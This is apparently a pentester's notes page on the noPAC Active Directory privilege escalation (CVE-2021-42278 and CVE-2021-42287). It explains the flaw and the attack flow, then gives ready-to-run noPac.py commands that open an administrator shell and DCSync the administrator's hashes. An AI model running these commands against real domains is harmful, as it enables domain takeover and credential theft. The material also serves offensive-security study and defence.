noPAC
ABOUT
Novemer 2021, it was discovered that combination of two vulnerabilities could allow domain escalation from a standart user.
CVE-2021-42278
Name Impersonation vulnerability. Was caused because of absence of checking $
after computer account name (because of sAMAccountName attribute).
CVE-2021-42287
When requesting a ST, you should present a TGT. When ST is not found by KDC, it searches again with $
. So imagine if we found TGT for user bob
, then bob
gets deleted, so it searches for bob$
. If it exists, we could obtain ST for bob$
.
Prerequisites
Authenticated low-privileged AD user
Unpatched DC vulnerable to both CVEs
Attacker can create machine accounts (default: 10 per user)
FLOW
Make / Rename pc account with similar name to DC but with $
Ask for TGT for this user
Delete / Change back name of pc account
Use that TGT to request for TGS
TGS checks who ownes that TGT. Checks original name, empty (Cause we deleted/changed name). so it tries same name but with $
Success, KDC thinks that you're TGT is DC's TGT
LINUX
For executing this vuln from Linux we need this exploit: [LINK]
Scanning for noPAC
sudo python3 scanner.py militech.local/sreed:passsword123 -dc-ip 13.13.13.13 -use-ldap
Running noPAC & Shell
sudo python3 noPac.py MILITECH.LOCAL/sreed:password123 -dc-ip 13.13.13.13 -dc-host MILITECH-EA-DC01 -shell --impersonate administrator -use-ldap
Session would be made with impacket's smbexec
Also noPAC would save TGT in local directory
DCSync using noPAC
sudo python3 noPac.py MILITECH.LOCAL/sreed:password123 -dc-ip 13.13.13.13 -dc-host MILITECH-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user MILITECH/administrator
Basically we just changed
-shell
l parameter with-dump